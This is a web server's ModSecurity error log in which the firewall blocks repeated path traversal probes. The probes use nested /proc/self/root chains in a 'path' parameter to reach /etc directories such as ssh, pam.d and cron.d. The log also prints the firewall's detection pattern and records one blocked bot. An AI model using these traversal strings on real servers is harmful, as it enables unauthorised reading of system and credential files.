"OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgtPZqj1wV0Si-OkefxlwAAAAc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:18:23.859839 2026] [:error] [pid 15061:tid 140411691570944] [client 74.7.243.203:49580] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgtT6TCbgAP5jq5TegtbgAAAsY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:18:26.448263 2026] [:error] [pid 11972:tid 140411540502272] [client 74.7.243.203:42366] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgtUpqj1wV0Si-OkefxoQAAABg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:18:37.184624 2026] [:error] [pid 21806:tid 140411641214720] [client 74.7.241.46:39548] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgtXdSswJuvopo3lOhibQAAAIw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 13:18:47.793700 2026] [:error] [pid 15568:tid 140411716749056] [client 74.7.243.203:42374] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgtZ6QpVkWug9HeOt84pQAAA0M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:19:07.927888 2026] [:error] [pid 10831:tid 140411590858496] [client 74.7.243.203:37810] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgte46lpbStxTqkSktvXAAAAlI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:19:09.269901 2026] [:error] [pid 10651:tid 140411540502272] [client 74.7.243.203:44198] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgtfbysWC90G-1nBrBH4AAAAZg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:19:55.389337 2026] [:error] [pid 21805:tid 140411590858496] [client 74.7.241.46:60594] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgtq7ABkC4fWIHEf8HunwAAAFI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 13:20:16.917988 2026] [:error] [pid 10831:tid 140411582465792] [client 74.7.243.203:48872] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgtwI6lpbStxTqkSktvmQAAAlM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:20:30.492402 2026] [:error] [pid 14895:tid 140411540502272] [client 74.7.243.203:58648] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgtzVajLEzk2WiQ-10V8gAAApg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:20:33.217026 2026] [:error] [pid 10772:tid 140411733534464] [client 74.7.243.203:54362] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgt0f9ocpUE4ed4uDzyKgAAAgE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:21:17.870979 2026] [:error] [pid 11972:tid 140411699963648] [client 74.7.241.46:38118] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgt_Zqj1wV0Si-Okefx-QAAAAU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 13:21:25.776617 2026] [:error] [pid 14895:tid 140411624429312] [client 74.7.243.203:54374] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abguBVajLEzk2WiQ-10WIAAAAo4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:21:29.670434 2026] [:error] [pid 15061:tid 140411641214720] [client 74.7.243.203:58064] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abguCaTCbgAP5jq5TegthQAAAsw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:21:36.820651 2026] [:error] [pid 10772:tid 140411725141760] [client 74.7.243.203:42762] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abguEP9ocpUE4ed4uDzyRwAAAgI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:21:40.252358 2026] [:error] [pid 21806:tid 140411666392832] [client 74.7.243.203:42772] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abguFNSswJuvopo3lOhigAAAAIk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:21:45.304593 2026] [:error] [pid 14895:tid 140411616036608] [client 74.7.243.203:60382] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abguGVajLEzk2WiQ-10WJwAAAo8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:21:57.693290 2026] [:error] [pid 21806:tid 140411616036608] [client 74.7.243.203:60384] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abguJdSswJuvopo3lOhikAAAAI8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:22:00.006942 2026] [:error] [pid 21533:tid 140411607643904] [client 74.7.228.16:35506] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abguKHjZBu2q05ozVU9b2AAAAVA"]
[Mon Mar 16 13:22:08.340485 2026] [:error] [pid 10772:tid 140411683178240] [client 74.7.243.203:55690] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abguMP9ocpUE4ed4uDzybAAAAgc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 13:22:10.872532 2026] [:error] [pid 10772:tid 140411641214720] [client 74.7.243.203:60050] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abguMv9ocpUE4ed4uDzycQAAAgw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:22:13.211473 2026] [:error] [pid 10831:tid 140411674785536] [client 74.7.243.203:48148] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abguNY6lpbStxTqkSktvowAAAkg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:23:52.591436 2026] [:error] [pid 15061:tid 140411590858496] [client 74.7.241.46:57832] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgumKTCbgAP5jq5TegtuwAAAtI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
